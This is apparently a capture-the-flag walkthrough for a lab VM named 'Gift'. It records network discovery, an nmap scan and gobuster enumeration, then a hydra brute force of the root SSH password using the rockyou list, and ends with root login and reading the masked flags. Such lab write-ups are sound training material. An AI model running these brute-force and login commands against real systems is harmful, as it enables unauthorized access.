# Gift Writeup #


--> Discovering Ip <--

sudo netdiscover
 Currently scanning: 192.168.70.0/16   |   Screen View: Unique Hosts           
                                                                               
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.0.2.59       08:00:27:3c:97:51      1      60  PCS Systemtechnik GmbH      


--> Scanning Ports and usind nmap <--

 nmap -p- -A -sCV -T5 10.0.2.59
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-21 16:32 +03
Nmap scan report for 10.0.2.59
Host is up (0.00037s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey: 
|   3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
|   256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_  256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open  http    nginx
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:3C:97:51 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.37 ms 10.0.2.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.42 seconds
zsh: segmentation fault  nmap -p- -A -sCV -T5 10.0.2.59


--> Checking the Website <--

curl http://10.0.2.59

Dont Overthink. Really, Its simple.
	<!-- Trust me -->


--> Gobuster <--

gobuster dir -u http://10.0.2.59 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,php,txt,css 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.2.59
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,php,txt,css
[+] Timeout:                 10s
===============================================================
2022/09/21 16:34:41 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 57]
                                              
===============================================================
2022/09/21 16:35:52 Finished
===============================================================


--> Nothing interesting I tried hydra to acquire the ssh password 

hydra -l root 10.0.2.59 -P /usr/share/wordlists/rockyou.txt ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-21 16:37:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.0.2.59:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[22][ssh] host: 10.0.2.59   login: root   password: ****** <-- Here is the root password
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-21 16:40:13


--> SSH Connection <--

ssh root@10.0.2.59              
The authenticity of host '10.0.2.59 (10.0.2.59)' can't be established.
ED25519 key fingerprint is SHA256:dXsAE5SaInFUaPinoxhcuNloPhb2/x2JhoGVdcF8Y6I.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:14: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.2.59' (ED25519) to the list of known hosts.
root@10.0.2.59's password: 
,,IM AN SSH SERVER
gift:~# whoami; id; hostname;
root
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
gift
gift:~# ls -la
total 20
drwx------    2 root     root          4096 Sep 24  2020 .
drwxr-xr-x   22 root     root          4096 Sep 18  2020 ..
-rw-------    1 root     root            56 Sep 21 13:50 .ash_history
----------    1 root     root            12 Sep 24  2020 root.txt
-rw-rw----    1 root     root            12 Sep 24  2020 user.txt
gift:~# cat root.txt
*********** <-- This is the root flag
gift:~# cat user.txt
*********** <-- This is the user flag 
